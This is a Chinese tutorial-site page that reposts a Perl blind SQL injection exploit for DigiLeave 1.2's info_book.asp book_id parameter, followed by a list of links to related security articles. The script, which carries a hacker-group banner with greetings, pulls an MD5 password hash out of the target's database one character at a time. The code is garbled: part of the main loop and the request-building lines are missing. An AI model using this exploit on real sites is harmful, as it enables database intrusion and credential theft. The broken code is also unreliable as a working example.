手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >DigiLeave 1.2 (info
DigiLeave 1.2 (info
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " #################### Viva IslaMe Viva IslaMe ################n";

print " # DigiLeave V1.2Blind SQL Injection Exploit #n";

print " # (info_book.asp book_id ) #n";

print " # Author: Mr.SQL #n";

print " # EMAIL : SQL@HOTMAIL.IT #n";

print " # #n";

print " # -((:: GrE3E3E3E3E3ETZ ::))- #n";

print " # #n";

print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #n";

print " # :: ALwHeD :: milw0rm :: #n";

print " # #n";

print " # MuSliMs HaCkErS #n";

print " # #n";

print " # PRODUCT SITE: #n";

print " # #n";

print " # HOME: WwW.PaL- #n";

print " # #n";

print " # Usage : perl test.pl host #n";

print " # Example: perl test.pl / -d 10 #n";

print " # Options: #n";

print " # -d valid book_id value #n";

print " #############################################################n";

exit;

}

my $host = $ARGV[0];

my $book_id = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "d=i");

print "[~] Exploiting...n";

if($options{"b"})

{

$book_id = $options{"b"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i get($query);

my $content = $resp->content;

my $regexp = "tourterms.pdf"; if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

}

【DigiLeave 1.2 (info】相关文章:

提升 MongoDB 安全性的10个方法

Linux下防御/减轻DDOS攻击的方法

关于病毒命名规则的说明

路由器网线怎么接

ARP欺骗攻击原理另一种理解方法

黑客破解Email账号最常用的三种方法

电脑管家怎么关联qq账号

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)

windows安全日志分析工具logparser用法详解

SSH蜜罐:kippo的详细介绍

精品推荐
分类导航